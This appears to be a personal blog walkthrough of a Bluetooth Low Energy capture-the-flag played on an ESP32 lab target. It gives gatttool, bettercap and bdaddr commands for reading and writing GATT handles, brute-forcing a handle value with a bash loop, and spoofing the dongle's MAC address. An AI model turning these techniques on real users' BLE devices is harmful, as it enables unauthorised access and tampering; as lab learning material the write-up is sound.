Bluetooth-Low-Energy(BLE) CTF

Hello! Lately, I’ve become interested in hardware security, and Bluetooth has always fascinated me. In this blog, I won’t explain what BLE is and what it’s used for, but I will discuss a BLE CTF.

Firstly, you need an ESP32 and a Bluetooth dongle to get started. Although you may not need the dongle, I purchased it anyway. To get started, you need to install the tool-chain using this link. You can follow the instructions step by step and then clone the repository.

You can check the Bluetooth settings with hciconfig, then use “sudo rfkill list all,” “sudo rfkill unblock all,” and “sudo hciconfig hci1 up.” You can get the MAC address by using “sudo hcitool lescan.”

You can check the characteristics by using “sudo gatttool -I,” “help,” “connect <MAC address>,” and “characteristics.”

After you run bettercap, use “ble.recon on” and “ble.enum <MAC>.”

Show score with gatttool:
gatttool -b de:ad:be:ef:be:f1 --char-read -a 0x002a|awk -F':' '{print $2}'|tr -d ' '|xxd -r -p;printf '\n'

Submit using gatttool:
gatttool -b de:ad:be:ef:be:f1 --char-write-req -a 0x002c -n $(echo -n "some flag value"|xxd -ps)

I could write a bash script for them, but I chose not to. You need to quit from bettercap when using gatttool to submit and show.

You need to quit from bettercap when using gatttool to submit and show.

We’ll use 0x002c handle to write flags, read 0x002 for the score. There is a hint for the first level which is an easy step.

Read the 0x002e handle and submit it to 0x002c handle. Score 2

I should have paid attention, submitted 20 characters before.

Read the handle, write to handle, read the handle again, submit the flag to 0x002c and read the score handle.

I made a mistake in first attempt

decimal 58 = hex 3a Score: 7/20

I need to brute force the handle from 00 to ff. This was one of the hardest levels to me. I haven’t know how use loops since it is impossible to do it manually. It may be possible but time wasting. HEX 0x00, DEC 0. HEX 0xFF, DEC 255.

I need to brute force the handle from 00 to ff which was one of the hardest levels for me. I didn’t know how use loops, as it was impossible to do it manually. It might be possible but it would be time-wasting. HEX 0x00, DEC 0. HEX 0xFF, DEC 255. And I used HEX numbers but took the hex’s of them by using printf %x $i Took the i value as a DEC and convert it to HEX. if i = 0 gatttool -b 7C:9E:BD:F9:C9:26 — char-write-req -a 0x003c -n $(echo -ne $a”0"|xxd -ps). and we put “\x“ istead of a.

gatttool -b 7C:9E:BD:F9:C9:26 — char-write-req -a 0x003c -n $(echo -ne “\x0”|xxd -ps) if i = 1 it would be gatttool -b 7C:9E:BD:F9:C9:26 — char-write-req -a 0x003c -n $(echo -ne “\x01”|xxd -ps) and so on. SCORE : 8/20

In this handle, I had to read the handle 1000 times. So it was simple after I had learned using for loops. Score: 9/20

Submit the flag to 0x2c handle. Score: 10/20

Same process what we did on the previous step. Listen to handle, convert hex to ASCII. Submit the flag. Score:11/20

Listen to me for multi notification. It was clear that we were going to use second noticitaion. Score:12/20

Score: 13/20

I have struggled with this step. I needed to change the MAC address of my Bluetooth dongle and I knew that `bdaddr` could do it. I tried running sudo bdaddr -i hci0 11:22:33:44:55:66 but the MAC address didn’t change. Instead of the previous command, you can use sudo bdaddr -i hci1 -r 11:22:33:44:55:66 and your bluetooth dongle will automatically be updated, then read 0x004c handle again, and the flag will be there. Score:14/20

As we see, -m parameter may help.

Unfortunately I was unable to change the MTU size by using the command gatttool -b MAC -m 444. Instead, I used the gatttool interface. What is MTU? You can take a look here for in all details.

Score: 15/20

On the 50th handle, I needed to do Write+resp ‘hello’ which seemed to have no significance. I wrote the message and read tge response, and found the flag. However, I didn’t understand the purpose of this step or how it differed from the other examples. I’ll update whenever I learn here

Score:16/20

NOTIFY property was about listening. Don’t agree what BLE says, check it manually. Here the flag. Score:17/20

In this handle, read the handle 54, write something and read again. In case to take a look NOTIFY property, listened the handle. Score:18/20

56th handle, I had to write md5 of the author’s twitter handle. It was quite simple and I Scored 19/20. However, I couldn’t reach the last handle as I might gave missed something. I went back to look at the handles againg and realized that I had forgottend about the handle 0x0016.

Feel free to reach out to me if you think I missed something. Also, I would be grateful if you could provide any explanations for the 50th handle. Thank you for spend your time.